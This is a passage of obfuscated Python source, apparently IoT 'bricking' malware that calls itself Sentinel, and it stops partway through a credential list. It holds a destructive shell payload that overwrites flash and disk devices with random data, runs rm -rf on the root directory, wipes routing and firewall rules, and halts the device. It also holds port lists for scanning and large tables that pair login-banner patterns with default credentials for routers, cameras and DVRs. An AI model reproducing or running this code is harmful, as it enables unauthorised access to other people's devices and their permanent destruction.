if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 if 49 - 49: o0oooooO / Ii11i1iIi * O0oo if 21 - 21: Oooo - I11I1Ii if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO time . sleep ( 3 ) if 20 - 20: Oo0 if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 if 60 - 60: o0oooooO + Ii + Ii % o0oooooO if 84 - 84: I11I1Ii * Ii11i1iIi I1IiI1I1 = OOo0O0oOOOO if 4 - 4: Oooo + oOOo0000o if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 i111IIIiII1i = False Oo0O00OOooO = False IiiI1 = False oOI11IIIi1II111 = True iiIII11I1i1Ii = True I1i = True i11iiiIi = True i1iii = True OOoOo00oO0 = True OO00oo0o = True if 5 - 5: IIiII + O0oo - i1 if 52 - 52: oOoO0Ooo / Ii / Ii if 24 - 24: oOOoO00oo0 i11 = [ ] II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 , 88 , 81 , 8080 , 8081 , 49152 , 5431 ] if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi O0oO0ooooOO = [ ] Iiii = { } oOo00o = [ ] O0oOo = { } I1I1I11 = { } if 53 - 53: O0oo . OOOoOooO % i1IIi1i1iiI % O0oo + O0oo * IIiII if 27 - 27: i1IIi1i1iiI / i1IIi1i1iiI - IIiIIiIii1I % O0oo0OOOOO00 % Ii / Ii OoooOoo0 = [ 80 , 81 , 82 , 8000 , 5555 , 8080 , 7547 , 8081 , 37215 , 52869 ] oOiI1iIiIi111 = [ 22 , 23 , 80 , 81 , 82 , 8000 , 2222 , 2323 , 8080 , 8081 , 23231 , 23123 , 6789 , 7547 , 5555 , 19058 , 8023 , 8022 , 5358 , 5000 , 5001 , 8888 , 9000 , 88 , 12323 , 8181 , 60023 ] I1i11II = 30 I1i1 = 10 O0OoO0O = 17 o0o = 3 o0o0oOOo = [ ] oO0iIiiiii1 = { } i11I11III1iii = { } O0OO0O00000 = { } OooO = { } O000O0o0oOOo = { } i1II = { } ii1o00 = [ ] i1IIOO0OOoO00OO = 0 I1i11IIii1iI1i1 = time . time ( ) if 91 - 91: I11I1Ii iIii1IiI11II1 = [ 22 , 2222 , 5358 , 6789 , 19058 ] if 65 - 65: O0oo / OOooOO0 % Oo0 / Ii % Ii11i1iIi if 75 - 75: Ii11i1iIi % Ii11i1iIi * I11I1Ii / Oooo / Oo0Oo * O0oo0OOOOO00 iiI1iiI = [ 22 , 23 , 2222 , 2323 , 6789 ] IIIii = 1 iIoO0O000oo = [ 15 , 30 , 60 , 120 , 240 , 480 ] Oo0Oooo = [ ] IiIIiI1iII1Ii = [ ] oO0OoOoO00OoO = { } if 55 - 55: o0oooooO . O0oo0OOOOO00 . i1IIi1i1iiI % Oooo / IIiIii1iI - i1IIi1i1iiI if 50 - 50: i1IIi1i1iiI . Oooo - Oooo . IIiII if 47 - 47: IIiIIiIii1I % Oo0Oo - oOOoO00oo0 + o0ooO if 47 - 47: I11I1Ii i1I1 = 100 OoO00 = 3 if 45 - 45: O0oo * o0ooO - oOOo0000o ooiI1 = 90 O0oOOoO = 600 oOooOooO0ooO = 20 if 27 - 27: i1 if 90 - 90: IIiII . Oooo - o0ooO % o0oooooO - IIiIIiIii1I if 40 - 40: Oo0Oo / o0ooO / oOoO0Ooo . IIiIii1iI . o0ooO ii11II = 'cat /proc/mounts\ncat /dev/urandom | mtd_write mtd0 - 0 32768\ncat /dev/urandom | mtd_write mtd1 - 0 32768\n' ii11II += 'busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/sda &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\n' ii11II += 'busybox route del default\ncat /dev/urandom >/dev/mtdblock0 &\ncat /dev/urandom >/dev/mtdblock1 &\ncat /dev/urandom >/dev/mtdblock2 &\ncat /dev/urandom >/dev/mtdblock3 &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mmcblk0 &\ncat /dev/urandom >/dev/mmcblk0p9 &\ncat /dev/urandom >/dev/mmcblk0p12 &\ncat /dev/urandom >/dev/mmcblk0p13 &\ncat /dev/urandom >/dev/root &\ncat /dev/urandom >/dev/mmcblk0p8 &\ncat /dev/urandom >/dev/mmcblk0p16 &\n' ii11II += 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &\niptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP\nhalt -n -f\nreboot\n' if 57 - 57: IIiIii1iI + i1 * i1IIi1i1iiI if 36 - 36: oOOoO00oo0 / oOOo0000o if 28 - 28: IIiIIiIii1I + Ii * i1 % IIiIIiIii1I if 66 - 66: OOooOO0 % O0oo0OOOOO00 if 36 - 36: OOOoOooO / O0oo . Ii11i1iIi / o0ooO - o0ooO % i1IIi1i1iiI def Oo000o0OOOo ( filename , bootup = False ) : global i111IIIiII1i global Oo0O00OOooO global IiiI1 global oOI11IIIi1II111 global iiIII11I1i1Ii global I1i global i11iiiIi global i1iii global OOoOo00oO0 global OO00oo0o global II1I1i11 global oOiI1iIiIi111 global OoooOoo0 if 12 - 12: Oooo Ooo0OO00 = [ ] oOo0oo = [ ] iII = [ ] Ooo0o0 = 0 if 13 - 13: i1IIi1i1iiI - oOOoO00oo0 if 30 - 30: oOOoO00oo0 / i1 - IIiII - Oooo * Oo0Oo * IIiII try : iiI = open ( filename , 'r' ) iiIi1IiII = iiI . read ( ) . split ( '\n' ) for III1I in iiIi1IiII : Oo00oO0O = re . search ( 'sTN: (\d+)' , III1I ) if Oo00oO0O : i111IIIiII1i = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sSO: (\d+)' , III1I ) if Oo00oO0O : Oo0O00OOooO = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sSR: (\d+)' , III1I ) if Oo00oO0O : IiiI1 = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sSD: (\d+)' , III1I ) if Oo00oO0O : oOI11IIIi1II111 = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sBR: (\d+)' , III1I ) if Oo00oO0O : iiIII11I1i1Ii = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sBL: (\d+)' , III1I ) if Oo00oO0O : I1i = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'sWP: (\d+)' , III1I ) if Oo00oO0O : i11iiiIi = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'eSC: (\d+)' , III1I ) if Oo00oO0O : i1iii = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'eBR: (\d+)' , III1I ) if Oo00oO0O : OOoOo00oO0 = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 Oo00oO0O = re . search ( 'eWP: (\d+)' , III1I ) if Oo00oO0O : OO00oo0o = bool ( int ( Oo00oO0O . group ( 1 ) ) ) Ooo0o0 += 1 if 'aLP: ' in III1I [ : 7 ] : Ooo0o0 += 1 III11 = re . compile ( '(\d+)' ) Ii11I = [ ] ; for OO0OO in III11 . finditer ( III1I ) : if not OO0OO in Ii11I : Ii11I . append ( int ( OO0OO . group ( 1 ) ) ) Ooo0OO00 = Ii11I if 'aSC: ' in III1I [ : 7 ] : Ooo0o0 += 1 III11 = re . compile ( '(\d+)' ) Ii11I = [ ] ; for OO0OO in III11 . finditer ( III1I ) : if not OO0OO in Ii11I : Ii11I . append ( int ( OO0OO . group ( 1 ) ) ) oOo0oo = Ii11I if 'aWP: ' in III1I [ : 7 ] : Ooo0o0 += 1 III11 = re . compile ( '(\d+)' ) Ii11I = [ ] ; for OO0OO in III11 . finditer ( III1I ) : if not OO0OO in Ii11I : Ii11I . append ( int ( OO0OO . group ( 1 ) ) ) iII = Ii11I iiI . close ( ) except : Ii111i11iIi ( 'ERR: Sentinel could not read config.' ) return if Ooo0o0 < 9 : if 81 - 81: IIiIIiIii1I % O0oo0OOOOO00 + I11I1Ii Ii111i11iIi ( "NOTC: Sentinel ignoring config due to lack of data." ) return oOiI1iIiIi111 = oOo0oo OoooOoo0 = iII if 62 - 62: o0oooooO + OOooOO0 + I11I1Ii if bootup : II1I1i11 = Ooo0OO00 return if 39 - 39: Ii11i1iIi * o0ooO / IIiII / I11I1Ii if 94 - 94: IIiIii1iI * o0ooO + Oo0Oo * IIiIii1iI * Ii11i1iIi for Ooo0o0oOO0o in Ooo0OO00 : if not Ooo0o0oOO0o in II1I1i11 : O0O0 = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0O0 . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 ) try : O0O0 . bind ( ( '0.0.0.0' , int ( Ooo0o0oOO0o ) ) ) O0O0 . listen ( 5 ) O0oO0ooooOO . append ( O0O0 ) Iiii [ int ( Ooo0o0oOO0o ) ] = O0O0 Ii111i11iIi ( "NOTC: Sentinel added listening port %d" % ( int ( Ooo0o0oOO0o ) ) ) except : pass for Ooo0o0oOO0o in II1I1i11 : if not Ooo0o0oOO0o in Ooo0OO00 : if 85 - 85: oOoO0Ooo - o0ooO if int ( Ooo0o0oOO0o ) in Iiii : O0O0 = Iiii [ int ( Ooo0o0oOO0o ) ] if O0O0 in O0oO0ooooOO : try : O0O0 . close ( ) except : pass O0oO0ooooOO . remove ( O0O0 ) Iiii [ int ( Ooo0o0oOO0o ) ] = None Ii111i11iIi ( "NOTC: Sentinel removed listening port %d" % ( int ( Ooo0o0oOO0o ) ) ) II1I1i11 = Ooo0OO00 if 24 - 24: IIiIIiIii1I - i1IIi1i1iiI . o0oooooO / oOOo0000o . OOOoOooO Oo000o0OOOo ( '/tmp/system/control.cfg' , True ) if 29 - 29: i1IIi1i1iiI + O0oo * Oo0Oo * OOOoOooO - OOooOO0 * i1IIi1i1iiI if 36 - 36: oOOo0000o if 36 - 36: Ii11i1iIi + IIiIIiIii1I - oOOoO00oo0 . Oo0 - Oo0Oo . O0oo0OOOOO00 if 65 - 65: OOOoOooO * OOOoOooO * oOOo0000o % i1 . Oo0 - O0oo i1I1iIIi1 = [ [ 'Login authentication' , 'admin/' , 'root/' , 'password/password' , 'telecom/telecom' , 'admin/admin' , 'root/root' , ] , [ 'Password:' , '/' , '/' , ] , [ 'GAPM-\d\d\d\d login' , 'root/root' , ] , [ 'PORT:9527:' , 'admin/' , 'admin/admin' , 'admin/123456' , 'admin/' , 'admin/12345' , 'admin/aa888888' , 'admin/admin' , 'admin/1234' , 'admin/888888' , 'admin/123456' , 'admin/0000' , 'admin/1111' , 'admin/666666' , 'admin/654321' , 'admin/111111' , 'admin/123' , 'admin/1' , 'admin/admin123' , 'admin/123abc456' , 'admin/000000' , 'admin/7773' , 'admin/112233' , 'admin/8888' , 'admin/1453' , 'admin/34567' , 'admin/686868' , 'admin/12345678' , 'admin/900009' , 'admin/54321' , 'admin/2499' , 'admin/123321' , 'admin/bdc3939' , 'admin/4321' , 'admin/88888888' , 'admin/abc123' , 'admin/admin1' , 'admin/9914' , 'admin/168168' , 'admin/spc123' , 'admin/sks12345' , 'admin/1212' , 'admin/13579' , 'admin/102030' , 'admin/34588' , 'admin/1122' , 'admin/121234' , 'admin/11111' , 'admin/9999' , 'admin/81171762' , 'admin/2580' , 'admin/999999' , 'admin/9742' , 'admin/2016' , 'admin/1974' , 'admin/admin12345' , 'admin/peak0429' , 'admin/123654' , 'admin/1987' , 'admin/1988' , 'admin/siera' , 'admin/2734988' , 'admin/55555' , 'admin/1023' , 'admin/123123' , 'admin/88888' , 'admin/9001' , 'admin/123456789' , 'admin/1985' 'admin/1010' , 'admin/2014' , 'admin/7777777' , 'admin/1976' , 'admin/2222' , 'admin/222222' , 'admin/7764' , 'admin/54637767' , 'admin/00000' , 'admin/5555' , 'admin/0257' , 'admin/717766' , 'admin/555' , 'admin/1234567' , 'admin/1103' , 'admin/121212' , 'admin/1967' , 'admin/456' , ] , ] if 99 - 99: OOooOO0 - O0oo0OOOOO00 - O0oo / OOOoOooO . Ii if 49 - 49: O0oo0OOOOO00 ooo0o00O00 = [ [ 'GM login:' , "root/GM8182" , ] , [ 'LocalHost login:' , 'root/xc3511' , "root/xmhdipc" , ] , [ '\(none\) login:' , 'vstarcam2015/20150602' , 'root/5up' , 'root/' , 'root/vizxv' , "root/juantech" , "root/zlxx." , 'root/antslq' , 'admin/admin' , 'root/123456' , 'root/1001chin' , 'root/win1dows' , 'admin/7ujMko0admin' , 'user/user' , 'root/jvbzd' , 'root/123' , 'admin/0000' , 'ftp/ftp' , 'root/7ujMko0vizxv ' , 'root/hunt5759' , '123/123' , 'root/ivdev' , ] , [ 'Welcome to Zhone Technologies' , 'admin/zhone' , ] , [ 'host login:' , 'root/vizxv' , ] , [ 'TL-WR7' , 'root/5up' , ] , [ 'F6' , 'root/Zte521' , ] , [ 'netween\.co\.kr' , 'baby/baby' , ] , [ 'kopp login' , 'root/kopp' , ] , [ 'MikroTik' , 'admin/' , 'user/user' , 'admin/' , 'installer/installer' , 'admin/admin' , 'test/test' , 'admin/12345' , 'admin/passw0rd' , 'admin/1234567890' , 'admin/password' , 'admin/admin123' , 'support/support' , 'admin/11111111' , 'admin/P@55w0rd!' , 'admin/888888' , 'admin/1234' , 'admin/123456' , 'admin/tsunami' , 'admin/admin1' , '0/0' , 'guest/guest' , 'admin/123' , 'admin/1111' , 'admin/admin1234' , 'admin/654321' , 'admin/4321' , 'admin/admin99' , 'admin/operator' , 'admin/hello' , 'admin/54321' , 'admin/666666' , 'test/test123' , 'root/root' , 'operator/operator' , 'monitor/monitor' , 'admin/abc123' , 'admin/system' , 'admin/secure' , 'router/router' , 'ftp/ftp' , 'Admin/Admin' , 'admin/0000' , 'ubnt/ubnt' , 'guest/123456' , '1234/1234' , 'admin/Admin123' , 'admin/admin00' , 'admin/99999999' , 'admin/motorola' , 'admin/administrator' , 'admin/2222' , 'user/admin' , 'root/root1234' , 'root/root123' , 'root/qwerty' , 'root/password' , 'root/12345' , 'root/1234' , 'root/123' , 'guest/guest123' , 'admin/vnpt' , 'admin/test' , 'admin/root' , 'admin/power' , 'Administrator/' , 'admin/diamond' , 'admin/conexant' , 'admin/atlantis' , 'admin/ADMIN' , '1/1' , 'root/12345678' , '888888/888888' , ] , [ 'Welcome to JNIOR' , 'jnior/jnior' , 'admin/admin' , 'jnior/1234' , 'admin/1234' , ] , [ 'Welcome to slush' , 'jnior/jnior' , 'admin/admin' , 'jnior/1234' , 'admin/1234' , 'root/tini' , 'guest/guest' , ] , [ 'heluyou login' , 'admin/h@32LuyD' , ] , [ 'OpenEmbedded Linux mdm9625' , 'admin/admin' , ] , [ 'PK5001Z login' , 'admin/CenturyL1nk' , 'admin/CTLSupport12' , 'admin/QwestM0dem' , ] , [ 'Ruijie login' , 'ruijie/ruijie' , ] , [ 'DSL-500B' , 'TMAR#DLKT20060205/DLKT20060205\n' , 'admin/admin\n' , ] , [ 'BusyBox on \S+ login' , 'admin/admin' , 'admin/1234' , 'root/Admin' , 'root/' , 'root/admin' , 'user/user' , 'admin/QwestM0dem' , 'admin/xad$l#12' , 'root/12345' , 'root/password' , 'root/1234567890' , 'root/123456' , 'admin/password' , 'root/1234' , 'Admin/Admin' , 'admin/1111' , 'admin/admin123' , 'admin/qwerty' , 'admin/nimda' , ] , [ 'Account:' , 'admin/1234' , ] , [ 'ktcatv login' , 'super/root' , 'admin/admin' , ] , [ 'Actiontec xDSL Router' , 'admin/CenturyL1nk' , 'admin/CTLSupport12' , 'admin/QwestM0dem' , ] , [ '!Login:' , 'admin/admin' , 'admin/ho4uku6at' , 'root/root' , 'support/support' , 'admin/admin1' , 'admin/1234' , 'admin/epicrouter' , 'admin/admin1234' , 'admin/admin123' , 'admin/12345' , 'telecomadmin/nE7jA%5m' , 'admin/1111' , 'admin/888888' , 'admin/54321' , 'supervisor/zyad1234' , 'admin/123' , 'admin/root' , 'admin/system' , 'manager/friend' , 'admin/123456' , 'admin/4321' , 'anonymous/anonymous' , ] , [ '(Router;Login|Gateway;Login)' , 'admin/admin' , 'admin/1234' , 'superadmin/Is$uper@dmin' , 'root/12345' , 'admin/password' , 'user/user' , 'tmadmin/tmadmin' , 'support/support' , 'support/admin' , 'admin/ho4uku6at' , '1234/1234' , 'supervisor/zyad1234' , 'admin/362729' , 'user/password' , 'admin/admin1' , 'admin/admin1234' , 'admin/admin123' , 'admin/abc123' , 'admin/12345' , 'admin/123' , 'root/root' , 'admin/1111' , 'admin/administrator' , 'admin/power' , 'root/admin' , 'admin/123456' , 'ZXDSL/ZXDSL' , 'admin/gvt12345' , 'telecomadmin/nE7jA%5m' , 'tech/tech' , 'ADSL/export03' , 'admin/adslroot' , 'admin/utstar' , 'admin/CenturyL1nk' , 'admin/CTLSupport12' , ] , [ '!Username:' , 'admin/admin' , 'user/user' , 'telecomadmin/nE7jA%5m' , 'guest/guest' , ] , [ 'UTT login:' , 'admin/admin' , 'admin/123456' , 'admin/54321' , 'admin/admin123' , 'admin/password' , 'admin/Admin123' , 'admin/1234567890' , 'admin/*58298' , 'admin/2oiidxii22' , 'admin/19761213' , 'admin/4276365' , 'admin/nimda' , 'admin/adminadmin' , 'admin/guest' , 'admin/a' , 'admin/ADMIN' , 'admin/administrator' , 'admin/adminstrator' , 'admin/root' , 'guest/guest' , 'guest/123456' , ] , [ 'DSL5\S+ login:' , "admin/admin" , "admin/bayandsl" , ] , [ 'TELNET session now in ESTABLISHED state' , 'Manager/friend' , ] , [ 'Remote Management Console' , 'netscreen/netscreen' , 'localadmin/localadmin' , ] , [ 'ANS\d\d\S+ login' , 'telnet/telnet' , ] , [ 'hktos login' , 'root/public' , ] , [ 'H6\d\S+ login' , 'root/vertex25ektks123' , ] , [ 'VMG\d+\-B10D' , 'root/zyad1234' , 'supervisor/zyad1234' , 'admin/admin1234' , 'admin/admin' , 'admin/1234' , 'admin/password' , 'zyuser/1234' , 'support/support' , 'user/user' , ] , [ 'tc login' , 'admin/1234' , 'root/vertex25ektks123' , 'admin/admin' , 'support/support' , 'admin/12345' , 'admin/admin1' , 'admin/123456' , 'admin/password' , 'admin/0000' , 'admin/ttnet' , 'admin/4321' , 'admin/1234567890' , 'admin/admin123' , 'admin/1111' , 'admin/54321' , 'admin/admin1234' , 'admin/654321' , 'admin/administrator' , 'engineer/amplifier' , 'admin/service' , 'admin/adsl' , ] , [ '(ralink|aquario) login' , 'Admin/' , 'admin/aquario' , 'admin/admin' , 'Admin/123456' , 'admin/h@32LuyD' , 'admin/aquario' , 'Admin/' , 'admin/admin' , 'Admin/' , ] , [ 'Welcome to RS' , 'admin/admin' , 'write/private' , ] , [ 'telnet session telnet0' , 'test1/test1' , ] , [ '870HNU' , '1234/1234' , ] , [ 'Ubee Interactive Corporation Telnet Server' , 'root/root' , ] , [ 'davolink login' , 'root/admin' , 'admin/admin' , 'davo/drc' , ] , [ 'login :' , 'admin/switch' , ] , [ 'Comtrend Gigabit' , '1234/1234' , ] , [ 'SAMSUNG ELECTRONICS .*Login' , 'root/' , 'admin/password' , ] , [ 'iGate .*ADSL' , 'admin/vnpt' , 'operator/operator' , ] , [ 'DD-WRT v24' , 'root/samsung' , ] , [ 'MontaVista.*Linux' , 'ftp/ftp' , 'admin/admin' , 'service/service' , 'admin/123456' , ] , [ 'Aamra Networks LIMITED' , 'support/support123' , ] , [ 'domain\.name login' , 'Admin/' , ] , [ 'EDR\-\S+ login' , 'user/' , ] , [ '(192.0.0.64|dvrdvs|Hikvision) login' , 'root/12345' , 'root/888888' , 'root/54321' , 'root/123456' , 'root/000000' , 'root/00000' , 'root/1234' , 'root/1' , 'root/123' , 'root/1234567890' , 'root/321' , 'root/1234567' , 'root/123123' , 'root/696969' , 'root/4321' , 'root/1111' , 'root/1234qwer' , 'root/password' , 'root/pu' , 'root/0000' , 'root/admin' , 'root/5555' , 'root/7777' , 'root/11111' , 'root/654321' , 'root/hikvision' , 'root/123456789abc' , 'admin/12345' , 'admin/1234' , 'admin/1234567890' , 'admin/admin1234' , 'admin/123456' , 'admin/admin' , 'admin/666666' , 'admin/654321' , 'admin/1111' , 'admin/admin1' , 'admin/22222' , 'admin/power' , 'admin/abc123' , 'admin/11111111' , 'admin/2222' , 'admin/0000' , 'admin/4321' , 'admin/123456789abc' , 'guest/12345' , 'hikvision/hikvision' , ] , [ '[rR][tT]-2\d+ login' , 'root/ttnet' , ] , [ '(t4-main|sanyo-board|smarteyes) login' , 'root/m' , 'root/mobiroot' , 'mg3500/merlin' , ] , [ 'meritlilin' , 'root/pass' , ] , [ 'MultiQb login' , 'root/admin' , ] , [ 'Avaya Cajun' , 'diag/danger' , ] , [ 'DB88FXX81 login' , 'root/svgodie' , ] , [ 'Draytek login' , 'draytek/1234' , ] , [ 'Tera-EP login' , 'admin/admin' , 'admin/1q2w3e' , ] , [ 'HDFW System' , 'hscroot/abc123' , ] , [ 'Copyright \(c\) 2004-20\d\d Hangz' , 'admin/admin' , 'admin/admin123' , 'admin/123456' , 'admin/' , 'root/admin' , 'admin/Admin' , 'admin/admin1' , 'admin/admin1234' , 'telecom/telecom' , 'webadmin/webadmin' , 'guest/guest' , '123/123' , 'root/123' , 'user/user' , 'root/root' , 'admin/system' , 'admin/adminadmin' , 'root/' , 'telecomadmin/nE7jA%5m' , 'root/123456' , 'admin/0000' , 'admin/654321' , 'simple/h3c' , ] , [ 'Copyright \(c\) 2010-2012 Hewle' , 'admin/admin' , 'admin/admin123' , 'admin/password' , ] , [ 'Dlink-Router login' , 'admin/qwerty' , 'admin/admin' , 'admin/12345' , 'admin/123456' , ] , [ 'this is ROS' , 'administrator/administrator' , ] , [ 'AG 5\d+' , 'operator/operator' , ] , [ 'BCM99999.*VosLogin' , 'admin/zhone' , 'root/1234567890' , 'root/54321' , 'admin/Admin' , 'IntraStack/Asante' , 'root/cat1029' , 'admin/smcadmin' , 'admin/admin' , 'admin/4321' , 'admin/1234' , 'admin/1234567890' , 'ubnt/ubnt' , 'guest/guest123' , 'root/' , 'quser/quser' , 'user/user' , 'Alphanetworks/wrgn23_dlwbr_dir600b' , ] , [ 'BCM963268 Broadband' , 'support/support' , 'support/1234' , 'admin/admin' , '1234/1234' , 'admin/adslroot' , 'admin/CenturyL1nk' , ] , [ 'BCM96338 ADSL' , 'admin/password' , 'support/support' , 'admin/362729' , 'admin/263297' , 'admin/admin' , ] , [ 'BCM96328 Broadband' , 'admin/password' , 'admin/admin' , 'support/support' , 'user/user' , '1234/1234' , 'user/user' , 'admin/administrator' , 'support/1234' , 'root/12345' , 'admin/gvt12345' , 'admin/362729' , 'admin/' , ] , [ 'BCM96818 Broadband' , 'user/user' , 'admin/password' , 'user/password' , ] , [ 'BCM96318 Broadband' , 'support/support' , 'admin/admin' , 'superadmin/Is$uper@dmin' , 'user/user' , 'admin/ho4uku6at' , 'support/1234' , 'admin/admin1234' , 'admin/admin01' , ] , [ 'BCM96362 Broadband' , 'user/' , ] , [ 'BCM96368 xDSL' , 'support/support' , 'telecomadmin/nE7jA%5m' , ] , [ 'Residential Gateway' , 'support/support' , 'user/password' , ] , [ 'router login:' , 'admin/1234' , 'user/1234' , ] , [ 'NetComm ADSL2\S Wireless Router' , 'admin/admin' , 'support/support' , 'admin/362729' , ] , [ 'Embedded Telnet Server.*WARNING:.*authorized users only' , 'cisco/cisco' , ] , [ 'User Access Verification' , "admin/admin" , "cisco/cisco" , "root/root" , "admin/" , "cisco/" , "Cisco/Cisco" , "admin/cisco" , "administrator/administrator" , "Advertisements/Advertisements" , "admin/123456" , "admin/password" , "admin/admin123" , "Administrator/password" , "Admin/123" , "router/router" , "test/test123" , "service/service" , 'admin/admin12345' , 'test/test' , 'admin/test' , 'root/1234' , 'telecom/telecom' , 'user/user' , 'admin/admin1' , 'Admin/123' , 'nagios/nagios' , 'mg3500/merlin' , 'Admin/1234' , 'piranha/piranha' , 'admin/root' , 'admin/ADMIN' , 'guest/guest' , 'admin/1234567890' , 'root/root1234' , 'support/123456' , 'test1/test1' , ] , [ 'DAM-2160i' , 'admin/888888' , ] , [ 'Please login' , 'super/sp-admin' , 'admin/password' , 'admin/sp-admin' , ] , [ 'Admin/Admin' , 'Admin/Admin' , ] , [ 'Elsist.*maintenance shell' , 'Admin/Admin' , ] , [ '(Welcome Visiting Huawei Home|ATP Cli)' , 'admin/admin' , 'user/user' , 'root/admin' , 'admin/1234' , 'support/support' , ] , [ '(AONT login|## login ##|192\.168\.0\.0 login)' , 'ONTUSER/SUGAR2A041' , 'root/root' , 'root/huigu309' , 'admin/admin' , 'IUSACELL/admin' , 'usradmin/usradmin' , 'CRAFTSPERSON/ALC#FGU' , ] , [ 'Air\S+ login' , 'root/12341234' , 'root/admin' , 'root/' , 'admin/airlive' , 'root/1234567' , 'root/12341234' , 'root/ttnet' , 'root/1111' , 'root/1020304' , ] , [ 'RT\-\d+\S+ login' , 'root/12341234' , 'root/Admin' , 'root/ttnet' , 'root/00000' , 'admin/qwerty' , ] , [ 'WR\d\d\S+ login' , 'telnet/telnet' , ] , [ 'ANS\S+ login' , 'telnet/telnet' , ] , [ 'Huawei Home Gateway' , 'support/support' , ] , [ 'FG1060N login' , "root/20080826" ] , [ 'HT-TM05 login' , "root/20080826" ] , [ 'M2M login' , "root/20080826" ] , [ 'NEXTAV login' , "root/20080826" ] , [ 'SVWIFI login' , "root/20080826" ] , [ 'TM01 login' , "root/20080826" ] , [ 'TM02 login' , "root/20080826" ] , [ 'WD02 login' , "root/20080826" ] , [ 'WD-N2 login' , "root/20080826" ] , [ 'WeZeeCard login' , "root/20080826" ] , [ 'WiDisk login' , "root/20080826" ] , [ 'WIFIUSB2 login' , "root/20080826" ] , [ 'ShAirDisk login' , "root/20080826" ] , [ 'aigoWiFi login' , "root/20080826" ] , ] if 32 - 32: oOOo0000o - Oo0Oo * OOooOO0 . Oo0Oo / oOOoO00oo0 % Oooo I1IIiI1i = [ "root/root" , "admin/admin" , "root/vizxv" , "root/GM8182" , "root/xc3511" , "root/xmhdipc" , "admin/1234" , "admin/CenturyL1nk" , "admin/QwestM0dem" , "support/support" , "root/123456" , "root/1234" , "root/12345" , "root/1001chin" , "root/password" , "admin/password" , "root/54321" , "root/juantech" , "root/admin" , "admin/7ujMko0admin" , "admin/smcadmin" , "admin/admin1234" , "admin/12345" , "admin/123456" , "admin/1111" , "root/Zte521" , "root/jvbzd" , "user/user" , "admin/smcadmin" , "guest/guest" , "root/dreambox" , "root/zlxx." , "ubnt/ubnt" , "root/cat1029" , "root/hunt5759" , "root/adminpassword" , "root/5up" , "admin/zhone" , "admin/admin1" , "root/" , "admin/epicrouter" , "root/123456" , "root/antslq" , "admin/admin123" , "supervisor/zyad1234" , "admin/1234567890" , "superadmin/Is$uper@dmin" , "admin/ho4uku6at" , "support/admin" , "root/123" , "root/1234567890" , "1234/1234" , "admin/54321" , "root/win1dows" , "admin/" , "root/888888" , "admin/888888" , "root/Win1doW$" , "mg3500/merlin" , "root/oelinux123" , "ubnt/ubnt" , "admin/0000" , "admin/11111111" , "admin/4321" , "admin/654321" , "admin/666666" , "root/000000" , "root/founder88" , "root/1111" , "admin/system" , "guest/123456" , "root/666666" , "root/0000" , "root/Admin" , "root/00000" , "root/root123" , "root/ipcam_rt5350" , "guest/guest123" , "root/1" , "root/win1dows" , "Admin/Admin" , "ONTUSER/SUGAR2A041" , 'admin/P@55w0rd!' , '123/123' , ] if 76 - 76: i1 . OOooOO0 / I11I1Ii * I11I1Ii iiIO0OOoo = [ '/' , "0/0" , "1111/1111" , "111111/111111" , "11111111/11111111" , "11111/x-admin" , '123/123' , "1234/1234" , "1502/1502" , "22222222/22222222" , "266344/266344" , "2800/2800" , "XXX:3500/24:123456" , "XXX:3500/24:pass" , "XXX:3500/24:12345" , "XXX:3500/24:3500/24" , "XXX:3500/24:h179350" , "3comcso/RIP000" , "666666/666666" , "7654321/7654321" , "888888/888888" , "a/a" , "aaa/" , "abarco/mistral5885" , "acc/acc" , "adfexc/adfexc" , "admin/" , 'Admin/' , "admin/0" , "admin/0000" , "admin/1111" , "aDMIN/1111" , "admin/1111111" , "admin/11111111" , "admin/1111Admin" , "admin/123" , "Admin/123" , "admin/1234" , "Admin/1234" , "admin/12345" , "admin/123456" , "aDMIN/123456" , "Admin/123456" , "admin/1234567890" , "admin/123456Admin" , "Admin/123456Admin" , "admin/12345Admin" , "admin/1234admin" , "admin/123Admin" , "admin/12888" , "Admin/12888" , "admin1/password" , "admin/2222" , "admin/22222" , "admin/22222Admin" , "admin/2601hx" , "admin2/changeme" , "admin/362729" , "Admin/3UJUh2VemEfUte" , "admin/4321" , "admin/54321" , 